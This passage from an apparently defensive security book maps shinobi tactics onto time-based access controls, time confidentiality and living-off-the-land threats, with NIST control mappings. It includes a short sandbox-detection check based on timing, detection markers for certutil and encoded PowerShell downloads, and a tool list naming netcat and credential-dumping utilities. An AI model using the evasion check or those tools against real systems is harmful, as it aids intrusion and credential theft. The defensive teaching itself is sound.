communication path to verify that authentication requests origi-

nate from verified users. [IA-2: Identification and Authentication

| (13) Out-Of-Band Authentication]

2. Ensure that staff do not disclose the existence of concealed rules

for 2-step authentication. [IA-5: Authenticator Management | (6)

Protection of Authenticators]

3. Establish multiple double-sealed rules so the tachisuguri isu-

guri is not static. [IA-5: Authenticator Management | (7) No

Embedded Unencrypted Static Authenticators]

4. Implement out-of-band communication and establish double-

sealed rules to maintain confidentiality. [SC-37: Out-Of-Band

Channels]

5. Carefully design error messages for failed authentication

attempts so they do not reveal double-sealed password informa-

tion that an adversary could exploit. [SI-11: Error Handling]


Debrief

In this chapter, you learned about an anti-shinobi authentication tech-

nique called the double-sealed password or tachisuguri isuguri. We cov-

ered the distinction between factors and steps in the identity verification

process. Then we undertook a brief analysis of the criteria for a good

tachisuguri isuguri authenticator along with several examples.

In the following chapter, we will discuss a shinobi concept called the

hours of infiltration. You’ll learn how certain hours of the day provide

advantageous opportunities for infiltration. Understanding these time-

based opportunities may help you choose when to implement or trigger

tachisuguri isuguri authenticators in your organization, such as only dur-

ing certain hours or on specific dates, to minimize the use of tachisuguri

isuguri and safeguard its secrecy.

6

HOURS OF INFILTRATION

After waiting until the hour of Ox, the ninja realized

that the guard had fallen asleep; everything was dead quiet,

and the fire was out leaving all in darkness.

For a shinobi, it is essential to know the proper time. It always

should be when the enemy is tired or has let their guard down.

—Yoshimori Hyakushu #5

When planning theft, espionage, sabotage, assassina-

tion, or other attacks, shinobi were not burdened by the

spirit of good sportsmanship or fair play. To the contrary,

they carefully considered the most “advisable times and

advantageous positions”1 to strike. The Shoninki stresses

the importance of waiting to infiltrate until a target is dis-

tracted, lethargic, likely to be hasty in judgment, drinking

and carousing, or simply exhausted; Yoshimori Hyakushu

poem 63 states that one’s tiredness “could be the cause of a serious blun-

der.”2 Shinobi were keen observers of such behavior and would often infil-

trate when an enemy was cutting down trees, focused on setting up their

own position, feeling tired after a fight, or changing guards.3


In studying their enemies’ behavior, shinobi noticed that predictable

human routines created windows of opportunity for attack. The scrolls

divide the day into two-hour blocks and recommend planning infiltration

during the blocks that tend to align with waking, eating, and sleeping. The

appropriate hour depends on the type of attack. Night attacks, for instance,

are best undertaken during


the hours of the Boar (9:00 PM–11:00 PM),

the Rat (11:00 PM–1:00 AM), and the Hare (5:00 AM–7:00 AM), animals

of the Chinese zodiac.4

In addition, Bansenshūkai notes that some generals believed in “lucky

days,”5 divined through Chinese astrology. On these dates, attacks were

thought predestined for victory. If shinobi could identify enemy command-

ers who believed these superstitions, they could use that information—for

example, by predicting troop movements based on what the commander

believed to be a lucky or unlucky day to leave camp. When it comes to

predictable patterns of behavior, not much has changed. In this chapter,

we’ll discuss how the cyber equivalents of time-scheduled events can be

targeted by threat actors.

Understanding Time and Opportunities

Because people still rise, work, eat, relax, and sleep on roughly the same

schedule as the feudal Japanese, the hours of infiltration suggested by the

scrolls align closely with when employees are distracted, exhausted, or

made careless by the challenges of a modern workday—in other words,

the times they’re most vulnerable to attack. Consider the scrolls’ time

blocks in the context of network and information system activity and

usage patterns:

Hour of the Hare (5:00 AM–7:00 AM) Users wake up and log in

for the first time that day. Automated and manual systems boot up,

causing spikes in event logs and syslogs.

Hour of the Horse (11:00 AM–1:00 PM) Many users take lunch

breaks, meaning they log out of their systems or are timed out for

being idle. They may also surf the web for personal reasons—they

read the news, shop, check personal email, post to social media, or

perform other activities that might trigger anomaly detection systems.

Hour of the Cock (5:00 PM–7:00 PM) Users find stopping points

for their work. They save files and perhaps rush to finish, greatly

increasing the risk of making mistakes in both their work and their

cybersecurity vigilance. For example, a worker might unthinkingly

open an attachment from an email that seems urgent. Users log out


of accounts and systems en masse, but some are simply abandoned,

left to time out and disconnect.

Hour of the Boar (9:00 PM–11:00 PM) Most users are away from

work. Whether they’re at home, out socializing, or getting ready for

bed, the security of their work accounts and systems is probably not

at the front of their minds. Organizations with staffed overnight

SOC coverage typically see a shift change during this time, creating

a window for attackers to strike between user logins or while SOC

users are getting up to speed for the evening. The later the hour, the

greater the possibility that users—even those used to late hours—

get sleepy or let their guard down because things seem quiet.

Hour of the Rat (11:00 PM–1:00 AM) Networks and systems run

backups or other scheduled maintenance, generating noise in net-

work sensors and SIEMs. SOC users might have completed their

daily security and maintenance tasks and could be immersed in proj-

ect work.

Hour of the Tiger (3:00 AM–5:00 AM) Batch jobs, including pro-

cessing log files, running diagnostics, and initiating software builds,

typically execute during this time. Aside from SOC personnel, most

users sink into the deepest part of their sleep cycle and are not active

on their accounts.

Lucky Days There are also specific days, weeks, and months

when adversaries are likely to target systems and users. While most

organizational leaders don’t base activity on “lucky days,” threat

actors are certainly aware of regularly scheduled upgrades or

maintenance, when organizations take their defenses offline, and

of three-day weekends and company holidays, when systems and

accounts go largely unchecked. If potential threats have not been

considered, irregularities in network traffic and system logs could

go unnoticed during these windows of opportunity, allowing adver-

saries to conduct attacks, perform reconnaissance or command

and control (C2) communication, spread malware, or execute data

exfiltration.

Developing Time-Based Security Controls and Anomaly Detectors

You can use the framework of the shinobi’s hours of infiltration to

develop time-based security that takes into account the baseline states


of the network at various times, deviations from baseline, and business

requirements. Applying time-based security is broadly achieved through

three steps:

1. Determine the activity baseline for each hour.

2. Train personnel to monitor activity and become very familiar

with typical activity during their assigned hours.

3. Assess the business needs for each hour. Based on this assess-

ment, create business logic and security axioms to further miti-

gate threats and detect anomalies.

First, consider dividing your network and system logs into one- or

two-hour segments. Review the historical trends and activity levels of your

network and systems to establish a baseline, a critical metric for threat

hunting and identifying cyberhygiene issues. Pay special attention to

times when attacks have occurred, as well as times that may be routinely

vulnerable to attack as determined by the organization's circumstances,

threat modeling, and experience.
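
As a minimal sketch of this segmentation, the code below buckets historical log timestamps into the scrolls' two-hour blocks, averages the per-day counts into a baseline, and flags blocks that stray far from it. The Poisson-style tolerance is an illustrative assumption.

```python
from collections import defaultdict
from datetime import datetime
from statistics import mean

def hourly_baseline(events: list[datetime]) -> dict[int, float]:
    """Average event counts per two-hour block (block 0 = 12-2 AM, ...)."""
    per_day = defaultdict(lambda: [0] * 12)
    for ts in events:
        per_day[ts.date()][ts.hour // 2] += 1
    return {block: mean(day[block] for day in per_day.values())
            for block in range(12)}

def is_anomalous(baseline: dict[int, float], ts: datetime, count: int) -> bool:
    """Flag counts far outside the block's historical average."""
    expected = baseline.get(ts.hour // 2, 0.0)
    return abs(count - expected) > 3.0 * max(expected, 1.0) ** 0.5
```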

Once all the data has been segmented and baselined, train analysts,

system administrators, and security professionals to become extremely

familiar with your network’s activity patterns. They should also be aware

of the security gaps that organizational routines create. The shinobi

scrolls instruct guards to scrutinize every irregularity and incongruity

during their shift. For instance, they are expected to notice when a fish-

erman arrives later than normal or if an unfamiliar bird calls at an odd

hour. Having security personnel similarly attuned to incongruities could

prompt them to look twice at an abnormal event, which could reveal a

security incident. Developing this deep expertise might require assigning

security personnel to monitor a sector—for instance, a single system that is

considered a likely target—becoming extremely familiar with it, and then reviewing

every log and event from that system for a two-hour time frame during

their eight-hour shift. This strategy is in stark contrast to the “monitor

everything at all times” mentality of most SOCs—a mentality that causes

alert fatigue, overload, and burnout. It should also mitigate the problems

of many automated anomaly detection systems, which need a human

to follow up on every anomaly and provide feedback and investigation.

These systems quickly become overwhelming and the data inscrutable to

security personnel who review anomalies on a daily or weekly basis.

Note that security logs are not ephemeral, like sounds in the night, but

are available for future analysis. It is plausible that a sophisticated adver-

sary might alter or eliminate security logs, filter traffic from network taps

and sensors, or otherwise compromise the systems intended to log their


intrusion and alert security. However, these actions should disrupt a sys-

tem’s normal behavior enough that an astute security analyst takes notice.

Next, you will want to ask yourself two questions:

• When are your users and systems active?

• When could the adversary be active?

Understanding how and when users log into and operate your systems

helps you strategically constrain access, making it more difficult for an

external or internal threat to infiltrate at your most vulnerable times. For

example, if a system is not in use between 8:00 PM and 8:00 AM, turn off

that system during those hours. If users have no business need to access

their systems on Saturdays, then disable access to those systems for all

users on Saturdays. Disabling systems at scheduled times also helps train

your SOC staff to detect anomalies during specific hours, as there will be

fewer alerts and systems to review. NIST standards suggest implementing


such access controls, but many organizations choose instead to prioritize

certain scenarios for operational convenience in emergencies, however

unlikely these occurrences may be.
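
A sketch of such a time-based constraint, assuming documented usage windows per system; the window table and weekday policy are illustrative:

```python
from datetime import datetime

# Documented business-need windows per system (local hours, half-open).
USAGE_WINDOWS = {
    "payroll-db": [(8, 20)],    # powered off from 8:00 PM to 8:00 AM
    "build-server": [(0, 24)],  # needed around the clock
}
WORKDAYS = {0, 1, 2, 3, 4}      # Monday-Friday; Saturdays disabled

def access_permitted(system: str, when: datetime = None) -> bool:
    """Deny logins outside the system's documented usage window."""
    when = when or datetime.now()
    if when.weekday() not in WORKDAYS:
        return False
    return any(start <= when.hour < end
               for start, end in USAGE_WINDOWS.get(system, []))
```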

CASTLE THEORY THOUGHT EXERCISE

Consider this scenario: you are the ruler of a medieval castle with valuable

information, treasure, and people inside . You receive credible intelligence

that a shinobi plans to infiltrate your castle. Imagine that your guards have

perfect knowledge of time but can enforce only the following rules:

• When any gate or door (interior or exterior) can be locked and

unlocked

• Curfews, after which anyone found in the halls will be detained

Consider what level of integrity, assurance, and security you might

achieve with the strict exercise of only those two time-based controls. How

would you train castle residents to operate within these strictures (how will

they use latrines at night, clean the premises while others sleep, take night

deliveries, and so on)? What compromises do you expect to make for your

security controls to be functional?

For this exercise, it is useful to draw a map of the imaginary castle or

your office building. Or you can use an abstracted layout of your network

map or data-flow diagram (DFD) as a “building,” where switches are hall-

ways, routers/firewalls are doors, systems are rooms, and VPNs/egress

points are gates .


Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with an applicable secu-

rity control from the NIST 800-53 standard. Each should be evaluated

with the idea of hours of infiltration in mind. (Note that applications of

these techniques require that logs and alerts have timestamps and that

time across all systems be in sync. See AU-8: Time Stamps.)

1. Evaluate your hours of operation and perform threat model-

ing. When are you most vulnerable to attack? What can you do

to train your staff to be prepared? [NIST SP 800-154: Guide to

Data-Centric System Threat Modeling]6

2. Implement time-based privilege controls on accounts based on

users’ business and operational needs. For example, restrict

certain users’ ability to send or receive work email after 7:00

PM. [AC-2: Account Management | (6) Dynamic Privilege

Management]

3. Restrict the ability to log into or use specific accounts during

certain hours. For example, when there is an attempt to perform

unauthorized actions on an inactive account between 9:00 PM

and 11:00 PM, alert the user immediately to verify their identity.

If they are unresponsive or their authentication fails, alert the

SOC. [AC-2: Account Management | (11) Usage Conditions]

4. Leverage heuristic analysis systems to detect abnormal system

access or usage patterns during set times. Users should volun-

tarily document and provide insight into their “typical usage”

patterns to help model their expected behavior during their

workday. [AC-2: Account Management | (12) Account Monitoring

for Atypical Usage]

5. Require system owners and users to document when systems

are expected to be in use and when they could be powered off.

[AC-3: Access Enforcement | (5) Security Relevant Information]

6. Shrink the time frame during which adversaries can operate.

Define a strategic enterprise policy whereby sensitive or propri-

etary information should be accessed only during set times—for

instance, between 11:00 AM and 3:00 PM on weekdays. [AC-17:

Remote Access | (9) Disconnect/Disable Access]

7. Inform the account holder when they have successfully or unsuc-

cessfully logged in, including the time and date of last login.

Tracking this information helps a user alert the SOC if their

account has been compromised and tell the SOC when the


unauthorized access occurred. [AC-9: Previous Login (Access)

Notification | (4) Additional Logon Information]

8. After establishing times of operation, configure user devices and

systems to automatically lock at a specified time, terminating all

sessions. [AC-11: Session Lock]

9. Document a policy that communicates the times and dates

that changes to infrastructure and systems are allowed. This

assists the SOC when evaluating network and configuration

changes on an hour-by-hour basis. [AU-12: Audit Generation |

(1) System Wide and Time Audit Correlation Trail; CM-5: Access

Restrictions for Change]

Debrief

In this chapter, you learned about traditional Japanese timekeeping based

on Chinese zodiac animals, Chinese astrology’s influence on divination,

and how shinobi likely used these to seize opportunities to infiltrate or

outmaneuver a target. You have considered how network activity may vary

depending on the time of day and how you can reduce attack opportunity

through time-based controls. You became familiar with the shinobi’s secu-

rity standard. Specifically, you learned that a security guard was expected

to notice the smallest incongruity in their scanning sector—anything that

might indicate the presence of an adversary. In addition, you reviewed

guidance on how to apply some of these concepts to your threat hunting,

security operation processes, and anomaly detection systems.

In the next chapter, we will review an application of time confidenti-

ality, keeping the time a secret from malware, which may allow defenders

to exercise particular detection and defense options.

7

ACCESS TO TIME

You should start your attack with no delay and not

prematurely but perfectly on time.

If you are going to set fire to the enemy’s castle or camp, you need

to prearrange the ignition time with your allies.

—Yoshimori Hyakushu #83

When shinobi were on a mission, particularly at night,

one of their most crucial and complex duties was keeping

track of time. If this task seems simple, remember that

shinobi did not have watches or clocks. They didn’t even

have sand hourglasses until the early 1600s.1 To send and

receive signals at the proper time, coordinate attacks,

know when the enemy would be vulnerable, and more,

shinobi had to develop methods to tell time reliably.

Historically, one way to mark the hours involved lighting incense

or candles known to burn at a constant rate, then ringing a bell at cer-

tain intervals to announce the time. Bansenshūkai recommends using

environmental cues, such as the movement of the stars, or weight-based

instruments to tell time.2 These weight-based instruments were likely


water clocks, sometimes called clepsydras, that used balance and water

flow/weight mechanisms to accurately signal time intervals. Other scrolls

include more abstruse options, such as tracking the change in dilation of

a cat’s iris throughout the day or the subtle thermal expansions of a dwell-

ing during the night, as these align with particular hours.3 Shinobi were

even taught to derive the hour by being mindful of which nostril they

were more actively breathing through. The scrolls explain how breath

comes prominently in and out of one nostril, then alternates to the

other, in regular intervals that can be used to track time. While this idea

might seem like pseudoscience, in 1895, German scientist Richard Kayser

observed and documented that during the day, blood pools on differ-

ent sides of a person’s nose, causing a noticeable reduction in airflow in

one of the nostrils, before alternating to the other nostril.4 Not only did

the shinobi’s acute observational skills identify this phenomenon more

than 300 years before its scientific publication in the West, but they also

developed a practical application for it. For example, they might need

to lie down in the crawl space of a floor beneath their target, where they

would be unable to light candles or incense, use instruments to track

time, or even dare open their eyes should the glint from their eye catch

the target’s attention through the cracks of the floor. Under these uncom-

fortable circumstances, they would lie still and pay attention to their

nose breath until the time to attack came—a stellar example of the shinobi's

discipline, ingenuity, and creativity.

The multitude of references to time in the shinobi scrolls, combined

with the arduous methods developed to track time, suggests that these

techniques would not have been developed if keeping track of time were

not crucial for a threat actor to operate effectively. The ubiquity of cheap,

easy, and reliable ways of telling time in modern society has almost cer-

tainly conditioned us to take time and its measurement for granted.

In this chapter, we’ll reconsider the value and importance of time

in digital systems while briefly reviewing how it is generated, used, and

secured with existing best practices. Then we will ask: if accurate time is

so important to an adversary, what might happen if we could keep time

secret from them? Or deny the adversary access to time? Or even deceive

them with an inaccurate time?

The Importance of Time

Time is necessary for the operation of almost every modern computer sys-

tem. By synchronizing sequential logic and generating a clock signal that

dictates intervals of function, computers establish finite pulses of time.

These pulses are like the ticking of a clock in which systems perform


operations on data in stable, reliable input/output environments. The

vast, intricate networks and systems that run our governments, econo-

mies, businesses, and personal lives operate on these pulses, requesting

the time continuously. They could not function without their clocks.

Numerous security controls exist to protect time data. Identity

authentication on Network Time Protocol (NTP) servers verifies that

an attacker is not spoofing a system’s trusted source of time. Encryption

and checksums—encryption encodes the communication, and checksums

serve to detect errors during transmission—on the NTP server’s time

data verify its integrity and protect it from tampering. A nonce is an arbi-

trary randomized number added to the time communication to prevent

repeated-transmission (replay) errors.

ging compare the system’s time to that reported by an authoritative time

source. NTP stays available and fault tolerant by leveraging multiple time

sources and alternate propagation methods, and if access to NTP is denied

or unavailable, backup methods can accurately estimate time based on

the last synchronization. Additional security best practices call for time-

stamping audit records, locking out sessions based on inactivity, restricting

access to accounts based on the time of day, assessing the validity of secu-

rity certificates and keys based on time and date information, establishing

when to create backups, and measuring how long to keep cached records.
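
As one example of monitoring time integrity, the sketch below compares the local clock against an NTP server and alerts on drift. It assumes the third-party ntplib package; the drift threshold is illustrative.

```python
import ntplib  # third-party: pip install ntplib

MAX_DRIFT_SECONDS = 1.0

def check_clock_drift(server: str = "pool.ntp.org") -> float:
    """Return the local clock's offset from an NTP server; a large
    offset may indicate tampering with the system's source of time."""
    response = ntplib.NTPClient().request(server, version=3, timeout=5)
    return response.offset

offset = check_clock_drift()
if abs(offset) > MAX_DRIFT_SECONDS:
    print(f"Clock drift of {offset:+.3f}s exceeds policy; investigate")
```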

These controls protect the integrity and availability of time data,

but rarely is enough consideration given to protecting time data’s con-

fidentiality. Almost any modern application can request the time at any

moment, and it is generally permitted access not only to the date and

time but also to clock libraries and functions. While NTP can encrypt

the time data it communicates to a system, there is a notable lack of con-

trols around restricting access to the current system time. Identifying this

control gap is important because time is a critical piece of information

adversaries use to spread malware. The destructive Shamoon malware,5

for instance, was set to execute at the start of the Saudi Arabian weekend

to inflict maximum damage; it was designed to wipe all infected systems

before anyone would notice.

Other common attacks include disclosing confidential information,

causing race conditions, forcing deadlocks, manipulating information

states, and performing timing attacks to discover cryptography secrets.

More sophisticated malware can use its access to time to:

• Sleep for a set period to avoid detection

• Measure pi to 10 million digits, timing how long the calculation
takes to determine whether the infected system is in a sandbox/
detonation environment designed to catch malware (a simplified
version of this check is sketched after this list)


• Attempt to contact its command and control (C2) based on spe-

cific time instructions

• Discover metadata and other information through timing attacks

that reveal the state, position, and capability of the target system
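
To make the sandbox check from the list above concrete—and easier for defenders to recognize—here is a simplified sketch of the same idea. Rather than timing a pi calculation, it times a requested sleep: some analysis sandboxes fast-forward sleeps, and a sleep that returns too quickly betrays the accelerated clock. The threshold is an illustrative assumption:

    import time

    def sleep_was_accelerated(seconds: float = 2.0) -> bool:
        """Return True if a requested sleep returned suspiciously fast."""
        start = time.perf_counter()
        time.sleep(seconds)
        elapsed = time.perf_counter() - start
        # On real hardware, elapsed should be at least the requested sleep;
        # a much smaller value suggests a patched or fast-forwarded clock.
        return elapsed < seconds * 0.5  # illustrative threshold

    if __name__ == "__main__":
        verdict = "possible sandbox" if sleep_was_accelerated() else "clock looks normal"
        print(verdict)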

If administrators could deny access to time (local, real, and lin-

ear), conducting operations within targeted information systems would

be much more difficult—and possibly infeasible—for the adversary.

However, it is important to note that haphazardly limiting time queries

will likely result in cascading failures and errors. A precise approach is

needed to deny access to time.

Keeping Time Confidential

Keep in mind that, because confidentiality is not as entrenched as other

forms of time security, applying such security controls will require special

effort from your organization and the greater security community.

Determine Your Baseline

Identify the software, applications, systems, and administrative commands

in your environment that require access to time. Implement function hook-

ing (interception of function calls) and logging to determine who and what

is requesting time. After establishing this baseline, use it to detect abnor-

mal time queries and inform a time-based needs assessment that will tailor

additional security controls (for example, Just in Time [JIT]).
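
As a minimal sketch of the function hooking described above—illustrative only, and done in Python rather than the OS-level API hooking a real deployment would use—the following wraps Python's own time.time so that every request for the time is logged with its caller:

    import inspect
    import logging
    import time

    logging.basicConfig(level=logging.INFO)
    _original_time = time.time  # keep the real function

    def _logged_time():
        # Record which file and line asked for the time
        caller = inspect.stack()[1]
        logging.info("time requested by %s:%d", caller.filename, caller.lineno)
        return _original_time()

    time.time = _logged_time  # install the hook

    # Any later call now leaves an audit trail for the baseline:
    now = time.time()

Even this toy version shows how quickly a who-asks-for-time baseline accumulates.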

Assess Technical Capability

Contact your hardware manufacturers and software vendors to deter-

mine what technical controls can be enabled to restrict access to time

functions. If there are no such controls, request that new features be

implemented to encourage the industry to develop solutions around

time confidentiality.

Establish Policy

Denying access to time is a nontraditional security control, but as with

more customary controls, enforcement requires establishing strategic

policy that details requirements—in this case, limiting access to time

and monitoring attempts to access time. Wherever possible, incorporate

the concept of time confidentiality in all change management decisions,

procurement of new hardware and software, and SOC prioritization.

Formally document new policies and ensure that your organization’s

CISO approves them.


CASTLE THEORY THOUGHT EXERCISE

Consider the scenario in which you are the ruler of a medieval castle with valuable assets within. You receive credible threat intelligence that a shinobi has infiltrated your castle with orders to set it on fire at precisely 3:00 am. At night, a guard in a tower burns a candle clock and strikes a bell every 120 minutes to keep the other night guards on schedule—a sound you believe the shinobi will also hear.

How can you control access to time to mitigate this threat? Which

trusted individuals within your castle require access to time, and to whom

can you deny complete access? Using only informational control of time,

what actions can you take to thwart the attack or discover the shinobi?

Recommended Security Controls and Mitigations

Where relevant, recommendations are presented with applicable security

controls from the NIST 800-53 standard. Each should be evaluated with

the concept of time confidentiality in mind.

1. Implement protections that block access to time data in time-

stamp logs or other information-monitoring logs. Preventing

time spillage or timestamp leakage could require physical, envi-

ronmental, media, and technical controls. [AU-9: Protection of

Audit Information]

2. Review your current information architecture with respect to

time, including the philosophy, requirements, and tactics neces-

sary to implement access and confidentiality controls around

time data in your environment. If stakeholders agree to time

restrictions, document them in a security plan with an approved

budget, resources, and time dedicated to implementation.

[PL-8: Information Security Architecture]

3. Conduct a log review and internal hunt to discover communica-

tion occurring over port 123 to any unofficial NTP servers in

your environment. Look for NTP communication to external

NTP servers and consider blocking access to NTP servers you do

not control. [SC-7: Boundary Protection]
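
A minimal sketch of the hunt in recommendation 3 follows. It assumes a flow log exported as CSV with src, dst, proto, and dport columns—a hypothetical schema you would adapt to your own logging—and flags UDP port 123 traffic to any server not on your approved list:

    import csv

    APPROVED_NTP_SERVERS = {"10.0.0.10"}  # hypothetical internal time source

    def hunt_rogue_ntp(flow_log_path: str):
        with open(flow_log_path, newline="") as f:
            for row in csv.DictReader(f):
                if row["proto"].upper() == "UDP" and row["dport"] == "123":
                    if row["dst"] not in APPROVED_NTP_SERVERS:
                        print(f"Rogue NTP: {row['src']} -> {row['dst']}")

    if __name__ == "__main__":
        hunt_rogue_ntp("flows.csv")  # hypothetical export from your firewall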


Debrief

In this chapter, you learned about some of the tools shinobi used to tell

time and what they did with their knowledge of time. We discussed how

important time can be to cyber operations and security, noting that cur-

rent security practices focus primarily on the availability and integrity

of time in systems. You were also exposed to a thought exercise that

explored how to mitigate a shinobi attack through time manipulation.

In the following chapter, we will discuss how shinobi could turn many

things into tools to accomplish tasks. Understanding what the equivalent

digital “tools” are may help you detect and safeguard against novel weap-

onization of such tools or at least hamper their use.

8

T O O L S

Remember, if you use a ninja tool, be sure to use it when the

wind is whistling so as to hide any sound and always retrieve it.

No matter how many tools you carry as a shinobi,

remember, above all things, that you should always

have your food on your waist.

—Yoshimori Hyakushu #21

While Hollywood depictions typically show ninjas bran-

dishing throwing stars or a katana, real shinobi developed

a vast and eclectic array of tools and weapons, and they

were instructed to take great care choosing the right tool

for the job.1 All three shinobi scrolls dedicate substan-

tial space to describing secret tools, many of which were

innovative technology for their time. Bansenshūkai alone

includes five sizeable volumes about tools. It states, among

other directives, that the best tools can be used for multiple purposes, are

quiet, and are not bulky.2 Shōninki advises shinobi to limit the number

of tools they carry, as any piece of equipment has the potential to arouse


suspicion if it seems out of place.3 The scroll also recommends that shinobi

seek out and sabotage the tools and weapons of their targets; such instru-

ments were of central importance to a shinobi’s capabilities.4

Of course, shinobi did not acquire their tools from any big-box shi-

nobi supply store. Instead, according to the guidance of the scrolls, they

made effective tools from items that were easily bought, found, or made.

This approach had several advantages. Such everyday items could be

carried without attracting much suspicion5 and even act as corroborat-

ing props for shinobi disguises. For example, several rulers, including

Toyotomi Hideyoshi and Oda Nobunaga, called for sword hunts—mass

confiscations of all swords and other weapons from civilians—in an

effort to reduce the ability of rebels to attack the ruling army.6 Under

these conditions, any non-samurai who wore a sword or other arma-

ments in public could expect to have their weapons seized. To bypass

this tactic, shinobi discreetly modified common farm implements to

be used as weapons, as there was no edict against carrying sharp farm

tools in public. In the hands of a trained shinobi, everyday farm tools

became lethal.

For all their practicality, Bansenshūkai asserts that the essential princi-

ple of using tools is not simply to wield them but to have an enlightened,

Zen-like understanding of their purpose.7 Shinobi contemplated their

tools’ usefulness deeply and frequently, constantly training with them

and reimagining their uses in the field. As a result, shinobi regularly

improved existing tools, invented new ones, and passed this knowledge

on to other, allied shinobi.8

In this chapter, we will contemplate tools. We’ll touch on the dual

nature of tools—how the same tool has the capability to do good or bad,

depending on its operator. This binary in-yo, or yin-yang, concept is a

useful model to understand how a hacker approaches digital tools. For

example, consider how a tool designed to help a user might be used for

malicious purposes.

In addition to possessing good-bad potential, each tool can also be

repurposed or applied in different ways. Take a moment to think of a

dozen or so ways one can use a hammer. Simple thought exercises like

this can help deepen your understanding of what exactly a hammer

is, how a hammer might be improved, and how a new type of hammer

might be invented to accomplish something novel. These same creative

skills can be applied to recoding digital and software-based tools. At

the highest levels of mastery, this creative repurposing is analogous

to the work of a master blacksmith. The blacksmith can forge new tools,

machines, and systems that can dramatically change how they think


about their own craft; open up new possibilities around what they can

build; and enhance their capabilities to develop new weapons, defenses,

and tools.

To be clear, the adversarial use of tools is likely a threat we will never

fully escape. That said, in this chapter, I will describe the security best

practices regarding tools, as well as some enhanced controls that may

mitigate attacks.

Living Off the Land

In cybersecurity, tools are any instruments that aid the manual or auto-

mated operation of a task. If that sounds like a widely inclusive defini-

tion, that’s because it is. There are physical tools, such as BadUSBs,

Wi-Fi sniffers, and lockpicks, and there are software tools, such as plat-

forms, exploits, code, scripts, and executables. An entire computer sys-

tem itself is a tool. A tool can have a legitimate use but, in the handsof

a hacker, become a weapon. Think, for example, of the SSH client an

administrator uses to perform remote maintenance on systems, which

an attacker can use for reverse SSH tunneling to attack systems and

bypass firewalls.

Much like shinobi, cyberadversaries rely heavily on tools to achieve

their goals, and they continuously develop, customize, hone, and test their

tools against existing technology in the wild. Sophisticated threat groups

employ full-time, dedicated tool and capability developers to maintain and

improve their tool set. In response, enterprising cyberdefenders work to

reverse engineer these custom tools so they can build countermeasures,

implement useful security policies and detection signatures, test mali-

cious tool capabilities in sandbox environments, and create application

whitelists that identify and block dangerous tools. In some cases, new

defenses are so well applied that adversaries cannot download or install

their tools to the target system, as the host-based security immediately

quarantines the tools, blocks access to them, and alerts security personnel

to their presence.

Because host-based security systems can detect and block specialized

tools and malware, many adversaries now practice an infiltration tactic

called “living off the land.” Using this approach, attackers first gather

intelligence on the software and tools already in use on the target sys-

tem. Then, they build their attack using only those applications, since

the host system’s defenses do not consider those applications harmful.

A living-off-the-land attack can use any file on the victim machine's disk,

including the task scheduler, web browser, and Windows Management


Instrumentation (WMI) Command-Line Utility, as well as scripting

engines such as cmd/bat, JavaScript, Lua, Python, and VBScript. Much as

shinobi appropriated common items in the target environment, like farm

tools, which they knew would be readily available and blend in, hackers,

by co-opting what already exists on the target machine, can turn everyday

user and admin tools, applications, and operating system files into tools

for their purposes.
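
Because living-off-the-land attacks use binaries the host already trusts, detection often comes down to how those binaries are invoked rather than whether they are present. The sketch below—a starting point, not a complete detector—scans running processes for legitimate tools paired with suspicious arguments. It assumes the third-party psutil package, and the marker strings are illustrative:

    import psutil  # third-party: pip install psutil

    # Legitimate binaries paired with argument fragments associated with
    # abuse; the markers below are illustrative, not a full signature set.
    SUSPICIOUS = {
        "certutil.exe": ("-urlcache", "http"),
        "powershell.exe": ("-enc", "downloadstring"),
    }

    def scan_processes():
        for proc in psutil.process_iter(["name", "cmdline"]):
            name = (proc.info["name"] or "").lower()
            cmdline = " ".join(proc.info["cmdline"] or []).lower()
            for marker in SUSPICIOUS.get(name, ()):
                if marker in cmdline:
                    print(f"Suspicious use of {name}: {cmdline}")

    if __name__ == "__main__":
        scan_processes()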

One common tool susceptible to exploitation on Windows machines

is Microsoft’s potent PowerShell framework. Even Microsoft acknowl-

edges that threat actors regularly target PowerShell to infiltrate systems,


perform unauthorized actions, and otherwise compromise an organiza-

tion’s systems. In turn, Microsoft offers security and mitigation capa-

bilities, such as Privileged Access Management (PAM) to enforce Just

Enough Administration (JEA) in combination with Just in Time (JIT)

administration. Unfortunately, JEA/JIT turns PowerShell’s ubiquity

into an access control nightmare for human IT administrators. How?

I’ll spare you the more technical details. Just imagine a technician

who is called to come troubleshoot a problem, but is only allowed to

bring a screwdriver and can only access that screwdriver between 1:00

and 2:00 PM.

Using access control measures to lock down tools works only if an

IT team is willing to severely restrict its own effectiveness. Even then,

there’s an inherent danger when these everyday tools exist on the target

system—cybersecurity professionals have observed threat actors freeing

tools from their local lock with ease. A fact of cybersecurity is this: as long

as these sophisticated tools exist, so does the potential to abuse them.

Securing Tools

The paradox of having tools is that you need them to operate, but so

does the adversary. One approach to this challenge is to reduce the num-

ber of tools—in terms of quantity, function, access, and availability—

to the bare minimum. While this strategy will make it somewhat dif-

ficult for you to operate inside your own environment, with adequate

security controls, it should make it even more difficult for a potential

adversary. One downside to this approach is that you are weakening the

resiliency and robustness of your capabilities to remotely manage your

environment. So, if an adversary compromises essential tools by remov-

ing or breaking them, your own protections may sabotage your ability


to manage and repair the system. For securing tools, the following steps

are a good start:

1. Determine your baseline. Conduct role-based employee surveys

and perform software inventory audits across all systems in your

organization. Document a comprehensive list of users, version

numbers, and system locations for every tool in your environ-

ment, including all software/applications, scripts, libraries, sys-

tems, and roles. This includes OS and system files, such as the

following (a minimal inventory sketch appears after these steps):

sc.exe find.exe sdelete.exe runasuser.exe

net.exe curl.exe psexec.exe rdpclip.exe

powershell.exe netstat.exe wce.exe vnc.exe

ipconfig.exe systeminfo.exe winscanx.exe teamviewer.exe

netsh.exe wget.exe wscript.exe nc.exe

tasklist.exe gpresult.exe cscript.exe ammyy.exe

rar.exe whoami.exe robocopy.exe csvde.exe

wmic.exe query.exe certutil.exe lazagne.exe

2. Review your findings and assess your needs. Evaluate every tool to

determine which users need it, as well as how, where, and when

it is used. For every tool, conduct a risk assessment to determine

the potential impact if an adversary gains access. Document

how you could restrict a tool’s capabilities to increase secu-

rity while incorporating justifiable compromises for business

operations—for example, disabling macros in Microsoft Word

and Excel.

3. Implement restrictions. Restrict availability, access, and authoriza-

tion for unnecessarily risky tools. Document any exceptions

and plan to revisit the exceptions every quarter to make users

request a renewal of their approval. You could even set tempo-

rary access that automatically revokes or deletes tools after a

period of time. Establish a whitelist of approved tools so that

any unrecognized or unauthorized tools are blocked automati-

cally from being delivered to your systems. Consider physically

locking all USB, media, Thunderbolt, FireWire, console, and

external ports on all systems, with written approval required to

unlock and use them.
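
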